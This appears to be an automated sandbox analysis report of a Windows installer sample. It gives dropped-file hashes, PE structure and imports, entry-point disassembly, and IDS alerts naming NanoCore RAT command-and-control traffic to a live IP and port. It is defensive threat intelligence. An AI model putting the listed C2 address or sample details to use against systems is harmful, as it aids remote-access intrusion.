                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8316
                  Entropy (8bit):3.690400665517579
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNimMH6x6YelSUtlVzgmf6S8+pr789b0isfucm:RrlsNiF6x6YcSUtTgmf6Ss0hfM
                  MD5:1B31096CBE7D3E726A599C9CC6C105DC
                  SHA1:DC57E5F1AD6FDCCC9413466C3E2E567289A054AB
                  SHA-256:2342825010A897DB92CA99D0E5152A2357D94781A5E600212A7C06B0E0D62726
                  SHA-512:8238BBD8DBE58B01AB1581794741357E3F167C1C2AE2F8241FAE26AEE97EF8AFDBCA087C5707079AA01BDD3362D218BCDC3E465D8B573D9A923029FCC5134DF7
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5104</Pid>
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4622
                  Entropy (8bit):4.405035055172041
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zsVJgtWI9D/TWgc8sqYj48fm8M4JH4FSz+q8vQ71zC2d:uITfva/igrsqYxJlKG1zC2d
                  MD5:84250B7D1D034DB38E11A3F83DBE5A25
                  SHA1:2C9AF8EB330B513D2C42C26980EE994E1F6D46E6
                  SHA-256:E0E1A16228EA62FF2E12D7A2D9821C0F50948DC4EC0403DF952C09C4340275A4
                  SHA-512:113313843B1AE96B5C6699CBE37A1A5085D0AFFAA359693F2B69B052C2213ECA5C431633A60AE512491F85F17E8EAA61D58F4F19120A7CF321495E0E51D29844
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1896928" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8155
                  Entropy (8bit):7.182663154059607
                  Encrypted:false
                  SSDEEP:192:darcitQvArWiPvoob95WlOPrifKTndVi/sv6fLtNI7ypzV:uCYrNPvoavPrifKzdo06hNI7q
                  MD5:67DF8B0B7F398320F69AA06DD324AABD
                  SHA1:EFEA18F4A780A5BE154E40A5A9C8535782D11AF2
                  SHA-256:244F2A16593E9A58DC56D66E8324BF0A019628C096CCF16D5355FF06265104CE
                  SHA-512:61F103CDECAA9575E6FA5B6DD4922B0E992CF0B01D4004B554AD9127539513ED825B7BE02D12999D748F0E5F34D76666104B6D0A9822C03E5A1F43EA6767D01A
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):412536
                  Entropy (8bit):7.742692963191059
                  Encrypted:false
                  SSDEEP:12288:BRxkjTLz3xjDWVfJQ9qCU/vfVUgzshA4K9Wx:Ne9DGJQ9qXd4pKS
                  MD5:45976AFF5588384336C2E3D34526DAC1
                  SHA1:19586AA0CEA35DDEE5E7EFBE097A3E9BCE24C46D
                  SHA-256:265CB23E00182EA146217F6E1F14AE29BA83C11D218F67CBEBE4668B165CE23D
                  SHA-512:77A8205B700A90E46924FD1FE342D296A1BC9A2D5C8AE928090130CC6EE7F9B00078A8F9D79B753CE792E7F565967DC78222954845626D518F6FBCCBFFE2FD2B
                  Malicious:false
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):82432
                  Entropy (8bit):6.3796829712891165
                  Encrypted:false
                  SSDEEP:1536:VAYSS9siqxKZXtrcbYoo526WIHgnlcdrzDSQnABsScD9:+YdyxKzxWxsScD
                  MD5:64F982758878F6A97ED4B3D99CFBD371
                  SHA1:56E0222B9D025CCDB4FFD6BE443EC11D042D4993
                  SHA-256:BE58EBBA3239A9AF70FD8E1FFDF426EA89855574FF8B38794262D445B4EB351B
                  SHA-512:BA592967E39EE53682CDF87A9BDD943F536321D1014DF1139531B73AF28B71CE596175B698A090E4306F7BB0C86694B822A1B57E13A879DD034F3ADED6E5D117
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 65%
                  • Antivirus: Virustotal, Detection: 52%
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):307935
                  Entropy (8bit):7.985923940553015
                  Encrypted:false
                  SSDEEP:6144:2hXx4RjTF5mqJlX4e3DljJJ3WJPksJQrCQXq1IzQ1/V/HnPfYuUJSrk:2RxkjTLz3xjDWVfJQ9qCU/vfVUp
                  MD5:ED01FB080A7C07E4B8ADEC8148D0C434
                  SHA1:81474DD1BD248E9D080D55495DB795B4C52CC57D
                  SHA-256:AAAFF8393BFBBB2AD8865ECBEC0989162825F52184FB305FB0846D0C2C0D9654
                  SHA-512:F5FB047014EB631A0EA91064D0C440A9489F50CC4160DBAC507AEBD5B58D752112F1C69AE15F81A136C51D962FE4E478CDEC52C8A9B7411C110076C09F99EA78
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):232
                  Entropy (8bit):7.024371743172393
                  Encrypted:false
                  SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                  MD5:32D0AAE13696FF7F8AF33B2D22451028
                  SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                  SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                  SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8
                  Entropy (8bit):3.0
                  Encrypted:false
                  SSDEEP:3:OjS:Ou
                  MD5:FDECF7936CC694269FF8F1961A68ADBB
                  SHA1:0BC2E2B015FB7A83E00CD0C8CFE08D25B5A60F6D
                  SHA-256:D1629F7944B42A620D3D35FFAA86125EC31C4E57D57EC0408CD71BCCD86E1E5B
                  SHA-512:A010C551B8E6885B903A388CC90579A8D5FAD24C900CA813DD044C57CED4B36E8812FD5FE9B57C0420DBBF8574BDEF2D6342FAC1C89C2207D2FC9E8127BF9DEF
                  Malicious:true
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):40
                  Entropy (8bit):5.221928094887364
                  Encrypted:false
                  SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                  MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                  SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                  SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                  SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):327432
                  Entropy (8bit):7.99938831605763
                  Encrypted:true
                  SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                  MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                  SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                  SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                  SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):82432
                  Entropy (8bit):6.3796829712891165
                  Encrypted:false
                  SSDEEP:1536:VAYSS9siqxKZXtrcbYoo526WIHgnlcdrzDSQnABsScD9:+YdyxKzxWxsScD
                  MD5:64F982758878F6A97ED4B3D99CFBD371
                  SHA1:56E0222B9D025CCDB4FFD6BE443EC11D042D4993
                  SHA-256:BE58EBBA3239A9AF70FD8E1FFDF426EA89855574FF8B38794262D445B4EB351B
                  SHA-512:BA592967E39EE53682CDF87A9BDD943F536321D1014DF1139531B73AF28B71CE596175B698A090E4306F7BB0C86694B822A1B57E13A879DD034F3ADED6E5D117
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 65%
                  • Antivirus: Virustotal, Detection: 52%
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):6.1512123375745995
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:PhviZrlpkW.exe
                  File size:775369
                  MD5:565044691fedb39980cb814dc26f9ebd
                  SHA1:d92f48359c385fd03a419e583495ead52428654e
                  SHA256:3a1c1eabfbe52d5a822e95462e730775ea9eef9d8d653f3a1ff6904378ad3e0c
                  SHA512:ee459c0234c40c4b353f9ea6dbdb8297adac7b63727fb5bcfefbfa2404e0d14882d48656caf8f62897cba00cf7de20da19eb638bc3530e8d13fdb85cfaf58b3c
                  SSDEEP:6144:8Ya6SW0O0WqiBiGei7FTjUosytWnSS1SqY7WnoVhcOdN3eJznS/FK0Y4Zh/9VR9A:8Y6WqyTT5WnoLX9dK0XZh1RYCChaWKDW
                  TLSH:73F4E0537A00B2E5D8B044397C1AC1F34B99AE3999543E573AD4BF3F38B5123960A73A
                  Icon Hash:fcd4dcc4f0797979
                  Entrypoint:0x403640
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007F3638DF5C5Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007F3638DF5C2Ah
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [0042A318h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0x64f00 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x3b000 | 0x64f00 | 0x65000 | False | 0.2831088528774752 | data | 3.743561491677653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country
                  RT_ICON | 0x3b328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | English | United States
                  RT_ICON | 0x7d350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States
                  RT_ICON | 0x8db78 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States
                  RT_ICON | 0x97020 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States
                  RT_ICON | 0x9b248 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States
                  RT_ICON | 0x9d7f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States
                  RT_ICON | 0x9e898 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States
                  RT_ICON | 0x9f220 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States
                  RT_DIALOG | 0x9f688 | 0x100 | data | English | United States
                  RT_DIALOG | 0x9f788 | 0x11c | data | English | United States
                  RT_DIALOG | 0x9f8a8 | 0x60 | data | English | United States
                  RT_GROUP_ICON | 0x9f908 | 0x76 | data | English | United States
                  RT_VERSION | 0x9f980 | 0x23c | data | English | United States
                  RT_MANIFEST | 0x9fbc0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                  DLL | Import
                  ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                  Language of compilation system | Country where language is spoken
                  English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/03/23-23:19:06.285273 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49726 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:46.673206 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49713 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:21.376630 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49718 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:33.469715 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49721 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:07.532553 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49716 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:53.669627 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49714 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:47.034655 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49723 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:30.731633 | TCP | 2810290 | ETPRO TROJAN NanoCore RAT Keepalive Response 1 | 1365 | 49702 | 193.31.30.138 | 192.168.2.4
02/03/23-23:18:58.945928 | TCP | 2816718 | ETPRO TROJAN NanoCore RAT Keep-Alive Beacon | 49725 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:32.574212 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49702 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:13.577404 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49717 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:52.672539 | TCP | 2816718 | ETPRO TROJAN NanoCore RAT Keep-Alive Beacon | 49714 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:40.364031 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49712 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:41.032521 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49722 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:59.896530 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49725 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:25.471865 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49693 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:01.525116 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49715 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:17:14.041382 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49691 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:27.458779 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49720 | 1365 | 192.168.2.4 | 193.31.30.138
02/03/23-23:18:53.018271 | TCP | 2816766 | ETPRO TROJAN NanoCore RAT CnC 7 | 49724 | 1365 | 192.168.2.4 | 193.31.30.138
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Feb 3, 2023 23:17:12.828109980 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828130007 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828150988 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828166962 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828181028 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828193903 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828211069 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828231096 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828252077 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828265905 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828282118 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828294039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828310966 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828331947 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828351974 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828368902 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828380108 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828393936 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828408003 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828428030 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828448057 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828464985 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828476906 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828490019 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828505039 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828524113 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828542948 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828562975 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828572989 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828586102 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828600883 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828620911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828640938 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828663111 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828671932 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828689098 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828701973 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828726053 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828748941 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828763008 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828774929 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828785896 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828804016 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828824997 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828845978 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828866959 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828876972 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828896046 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828919888 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828934908 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828950882 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.828960896 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.828980923 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829001904 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829021931 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829044104 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.829051971 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829071045 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829096079 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829102039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.829113007 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.829128027 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829149008 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829169035 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829189062 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.829204082 CET496911365192.168.2.4193.31.30.138
